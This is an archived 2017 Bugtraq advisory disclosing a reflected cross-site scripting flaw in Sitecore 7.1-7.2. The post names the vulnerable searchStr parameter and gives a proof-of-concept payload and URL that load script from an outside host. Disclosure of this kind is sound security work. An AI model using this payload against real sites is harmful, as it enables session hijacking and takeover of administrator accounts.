lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Jun 2017 20:57:31 GMT
From: hamedizadi@...il.com
To: bugtraq@...urityfocus.com
Subject: Sitecore 7.1-7.2 Cross Site Scripting Vulnerability

Sitecore 7.1-7.2 Cross Site Scripting Vulnerability

Information
--------------------
Author: Hamed Izadi 
Email: ("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in Sitecore
Affected Software : Sitecore.NET
Affected Versions: v7.2-7.1 and possibly below
Vendor Homepage : http://www.sitecore.net/
Vulnerability Type : Cross-site Scripting
Severity : Important


Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in users session. This means that the malicious hacker can change
the logged in users password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrators session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details
--------------------
Proof of Concept URLs for XSS in Sitecore 7.1-7.2:

/Search-Results?searchStr=
(searchStr - GET)

XSS Payload : <script src=https://openbugbounty.org/1.js>

Example: 
/Search-Results?searchStr=<script src=https://openbugbounty.org/1.js>


 



Solution
--------------------
Upgrade to newer version


Credits & Authors
--------------------
These issues have been discovered by Hamed Izadi


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ